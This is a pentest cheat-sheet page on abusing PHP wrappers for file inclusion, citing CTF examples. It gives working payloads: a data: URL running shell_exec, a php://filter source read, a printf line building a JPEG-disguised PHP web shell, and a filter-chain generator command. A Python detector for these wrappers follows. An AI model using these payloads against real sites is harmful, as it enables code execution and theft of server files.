PHP Wrappers

Wrappers

data

Display a string on the web page:

http://10.11.0.22/menu.php?file=data:text/plain,hello world

Shell with data

http://10.11.0.22/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

php://filter

Read a file with base64 encoding:

php://filter/convert.base64-encode/resource=index.php

Examples: StreamIO

Bypassing restrictions

Using a magic number to bypass a JPEG restriction:

printf '\xff\xd8\xff<?=`{$_GET["cmd"]}`;>' > sploit.php

Examples: ECHO CTF Cupidme

PHP FILTER CHAIN GENERATOR

An excellent option for creating a wrapper is to append encoding wrappers for every character. This can be done with php_filter_chain_generator:

$ php -r "echo file_get_contents('php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|/resource=php://temp');"
cwwwwcGyQpQw+-AD0APQ+-AD0APQ+-AD0APQ+-AD0APQ+-AD0APQ+-AD0APQ+AD0APQ-
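
A defensive counterpart to the wrapper payloads above, as an added example (not code from the original post): a Python check that flags `data:` and `php://` wrappers in request parameters, including long `php://filter` chains like the generated one. The function names, the stage threshold and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Assumed threshold: a manual php://filter read needs one or two filters,
# while generated chains run to dozens of stages.
MAX_FILTER_STAGES = 4

# Constructed sample requests, modelled on the URLs shown above.
SAMPLE_REQUESTS = [
    "/menu.php?file=home",
    "/menu.php?file=data:text/plain,%3C%3Fphp%20echo%201%20%3F%3E",
    "/menu.php?file=php://filter/convert.base64-encode/resource=index.php",
    "/menu.php?file=php%253A%252F%252Ffilter/"
    + "|".join(["convert.base64-encode", "convert.base64-decode"] * 3)
    + "/resource=php://temp",
]

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding (bounded) so php%253A%252F%252F is seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_param(value):
    """Return the findings for one query-parameter value."""
    value = decode_fully(value).strip().lower()
    if value.startswith("data:"):
        return ["data-wrapper"] + (["php-code"] if "<?" in value else [])
    if value.startswith("php://filter"):
        # Filters sit before "/resource=", separated by "|" or "/".
        spec = value[len("php://filter"):].split("/resource=", 1)[0]
        stages = [s for s in re.split(r"[|/]", spec) if s]
        long_chain = len(stages) > MAX_FILTER_STAGES
        return ["php-filter"] + (["long-filter-chain"] if long_chain else [])
    return ["php-stream"] if value.startswith("php://") else []

def scan_request(url):
    """Map each suspicious query parameter of a request URL to its findings."""
    pairs = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    hits = {name: classify_param(value) for name, value in pairs}
    return {name: found for name, found in hits.items() if found}

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(request[:60], "->", scan_request(request) or "clean")
```

Detection of this kind complements, and does not replace, mapping the `file` parameter to a fixed allowlist of includable pages on the server side.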

Common Attacks
